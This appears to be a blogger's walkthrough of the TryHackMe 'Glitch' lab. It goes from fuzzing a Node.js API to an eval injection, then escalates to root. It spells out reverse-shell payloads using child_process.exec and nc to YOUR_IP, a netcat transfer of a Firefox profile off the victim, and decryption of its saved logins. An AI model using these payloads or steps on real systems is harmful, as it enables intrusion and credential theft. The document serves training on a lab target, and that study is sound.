TryHackMe — Glitch

Having fun with TryHackMe again. So here is the write-up and a walkthrough for the Glitch challenge.

Room: https://tryhackme.com/room/glitch
Level: Easy

Task: Challenge showcasing a web app and simple privilege escalation. Can you find the glitch?

Let's get started

As usual, start the machine and open the IP in a browser (it took about 10 minutes to come up; I don't know why).

Just a blank page with a glitch wallpaper. Opening the browser console reveals an API endpoint. Let's open it in the browser.

Oh, there is a token. But that's not the answer. It looks like base64. Decoding it with CyberChef,

First flag done! Moving on, let's keep investigating.

From the request, there is a default cookie of the form token=value. Let's change it

document.cookie="token=**************"

and refresh the page. Nothing seems to change. Let's try POST

# curl -X POST http://10.10.82.X/api/access --cookie "token=**************"
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot POST /api/access</pre>
</body>
</html>

Never mind. Let's just run feroxbuster against /api

# feroxbuster --url http://10.10.82.X/api -w ~/dirb/big.txt -t 20
🎯 Target Url │ http://10.10.82.X/api
🚀 Threads │ 20
📖 Wordlist │ ~/dirb/big.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.2.3
💉 Config File │ /usr/local/bin/ferox-config.toml
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200 1l 1w 36c http://10.10.82.X/api/access
200 1l 1w 169c http://10.10.82.X/api/items
[####################] - 3m 20468/20468 0s found:2 errors:0
[####################] - 3m 20468/20468 101/s http://10.10.82.X/api

Found another hidden endpoint: /api/items

# curl -X GET http://10.10.82.X/api/items
{"sins":["lust","gluttony","greed","sloth","wrath","envy","pride"],"errors":["error","error","error","error","error","error","error","error","error"],"deaths":["death"]}

Hmm, I don't know what that means. By this point the cookie is no longer required at all. Maybe there is a glitch in the system. Hehe. Anyway, let's keep trying POST,

# curl -X POST http://10.10.82.X/api/items
{"message":"there_is_a_glitch_in_the_matrix"}

There is a message. There must be something hidden here. A hidden parameter, maybe? The quicker way to check is with Arjun,

# arjun -u http://10.10.7.149/api/items -m POST -w ~/wordlists/wfuzz/general/common.txt
Probing the target for stability
Analysing HTTP response for anamolies
Analysing HTTP response for potential parameter names
Logicforcing the URL endpoint

No result, hmm. I think I need to use wfuzz instead. Running wfuzz with the same wordlist...

# wfuzz -z file,wordlists/wfuzz/general/common.txt -c -d "testing" --hc 400,401,403,404 http://10.10.X.X/api/items\?FUZZ\=testing
Target: http://10.10.X.X/api/items?FUZZ=testing
Total requests: 950
====================================================================
ID Response Lines Word Chars Payload
====================================================================
000000201: 500 10 L 64 W 1084 Ch "cmd"

"cmd", okay. So there is a parameter called cmd that changes the page response. Let's see

# curl -X POST http://10.10.X.X/api/items?cmd=test
....
....
<pre>ReferenceError: test is not defined<br> &nbsp; &nbsp;at eval (eval at router.post (/var/web/routes/api.js:25:60)
....
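The stack trace above points at an eval() call inside router.post in api.js. As an added illustration (not the room's source, which the page does not show), here is the handler shape that produces exactly that error, next to a version that never hands the parameter to eval; the data, function names and operation table are assumptions of this example.

```javascript
// Constructed sample data mirroring what GET /api/items returned on the page.
const items = {
  sins: ["lust", "gluttony", "greed", "sloth", "wrath", "envy", "pride"],
  errors: Array(9).fill("error"),
  deaths: ["death"],
};

// Vulnerable shape (assumed, not the room's code): the untrusted ?cmd= string
// becomes JavaScript source. cmd=test yields "ReferenceError: test is not
// defined", the same message the page shows, and any syntactically valid
// expression runs with the server's privileges.
function vulnerableHandler(query) {
  if (query.cmd === undefined) {
    return { message: "there_is_a_glitch_in_the_matrix" };
  }
  return eval(query.cmd); // never do this
}

// Hardened shape: cmd selects an entry from a fixed table of named
// operations. No user-supplied string ever reaches eval(), Function()
// or child_process, so there is nothing for a payload to execute.
const operations = {
  count: () =>
    Object.fromEntries(Object.entries(items).map(([k, v]) => [k, v.length])),
  list: () => items,
};

function hardenedHandler(query) {
  const cmd = query.cmd;
  if (cmd === undefined) {
    return { status: 200, body: { message: "there_is_a_glitch_in_the_matrix" } };
  }
  // hasOwnProperty guards against inherited keys such as "constructor";
  // the rejection message deliberately does not echo cmd back.
  if (typeof cmd !== "string" ||
      !Object.prototype.hasOwnProperty.call(operations, cmd)) {
    return { status: 400, body: { error: "unknown command" } };
  }
  return { status: 200, body: operations[cmd]() };
}
```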

Okay, let's test whether this can be turned into a reverse shell. Referring to this GitHub repo,

require('child_process').exec('nc -e /bin/sh YOUR_IP 1234')

Run nc -nvlp 1234 first. Then try this,

# curl -X POST -G http://10.10.X.X/api/items --data-urlencode "cmd=require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 1234 >/tmp/f')"
vulnerability_exploited [object Object]

The response says the vulnerability was detected, and luckily the reverse shell is working

Connection from 10.10.X.X:55038
/bin/sh: 0: can’t access tty; job control turned off
$

First things first, upgrade the shell,

# python -c 'import pty; pty.spawn("/bin/bash")'

Now, hunt for the user.txt file

# ls -al ~/
drwxr-xr-x 8 user user 4096 Jan 27 10:33 .
drwxr-xr-x 4 root root 4096 Jan 15 14:13 ..
-rw-rw-r-- 1 user user 22 Jan 4 15:29 user.txt
# cat ~/user.txt
THM{XXXXXXXXXXXXXXXXX}

OK, now for root!

From the same directory

# ls -al
lrwxrwxrwx 1 root root 9 Jan 21 09:05 .bash_history -> /dev/null
-rw-r--r-- 1 user user 3771 Apr 4 2018 .bashrc
drwx------ 2 user user 4096 Jan 4 13:41 .cache
drwxrwxrwx 4 user user 4096 Jan 27 10:32 .firefox
drwx------ 3 user user 4096 Jan 4 13:41 .gnupg
drwxr-xr-x 270 user user 12288 Jan 4 14:07 .npm
drwxrwxr-x 5 user user 4096 Apr 6 06:08 .pm2
drwx------ 2 user user 4096 Jan 21 08:47 .ssh
-rw-rw-r-- 1 user user 22 Jan 4 15:29 user.txt

The .firefox folder has full permissions for everyone (drwxrwxrwx).

# ls -al .firefox
drwxrwxrwx 11 user user 4096 Jan 27 10:32 b5w4643p.default-release
drwxrwxrwx 3 user user 4096 Jan 27 10:32 'Crash Reports'
-rwxrwxr-x 1 user user 259 Jan 27 10:32 profiles.ini

It's actually a Firefox profile directory, which holds sensitive information. Drilling down, I found b5w4643p.default-release/login.json

{"nextId":2,"logins":[{"id":1,"hostname":"https://glitch.thm","httpRealm":null,"formSubmitURL":"","usernameField":"","passwordField":"","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECCP5HBZJq0+DBAjWdWrk7qo4eA==","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECPfxo08d5UxEBBB9aJ+chJC2pDccxKhqs1UH","guid":"{9c80e9f2-0377-496e-9404-4411eb94783b}","encType":1,"timeCreated":1610645982812,"timeLastUsed":1610645982812,"timePasswordChanged":1610645982812,"timesUsed":1}],"potentiallyVulnerablePasswords":[],"dismissedBreachAlertsByLoginGUID":{},"version":3}

Everything is encrypted. Searching for a decrypter, I found this repo. But I was unable to git clone it on the victim machine. So we can use netcat to pull the Firefox folder down instead. Archive it first

# tar -czvf firefox.tar.gz .firefox

OK, now on the victim machine, run this netcat command

# nc YOUR_IP 4444 -w 3 < ~/firefox.tar.gz

And on the local machine, listen

# nc -lvp 4444 > ~/Downloads/firefox.tar.gz
Connection from 10.10.X.X:60726

OK, it downloaded successfully. Extract it and run the Firefox decrypter.

# python3 firefox_decrypt.py ~/Downloads/.firefox
Select the Mozilla profile you wish to decrypt
1 -> hknqkrn7.default
2 -> b5w4643p.default-release
2
Website: https://glitch.thm
Username: 'v0id'
Password: 'XXXXXXXXXXXX'

Oh! That was fast. Let's use it to SSH in as the v0id user

# ssh v0id@10.10.7.149
ssh: connect to host 10.10.7.149 port 22: Operation timed out

Okay, SSH isn't possible, so try su from inside the victim machine

# su v0id
password: XXXXXXXXXXX
v0id@ubuntu:~$

Success! It's working...

# ls /root
ls: cannot open directory '/root': Permission denied
# sudo -l
password:
Sorry, user v0id may not run sudo on ubuntu.

Let's look at the hint; it says "sudo is bloat." A Google search's first result says "Sudo Is Bloat. Use Doas Instead!". So I typed the doas command

v0id@ubuntu:/home/user$ doas
usage: doas [-nSs] [-a style] [-C config] [-u user] command [args]

It accepts a command argument. Let's see whether it can access the root folder

# doas ls /root
password: XXXXXXXXXXXXX
clean.sh root.txt

Haha! Then I can simply cat the file

# doas cat /root/root.txt
password: XXXXXXXXXXXXXX
THM{XXXXXXXXXXXXXXXXXXXX}

Done!!!

~~~Happy Hacking~~~

Software Engineer at Teratotech.com
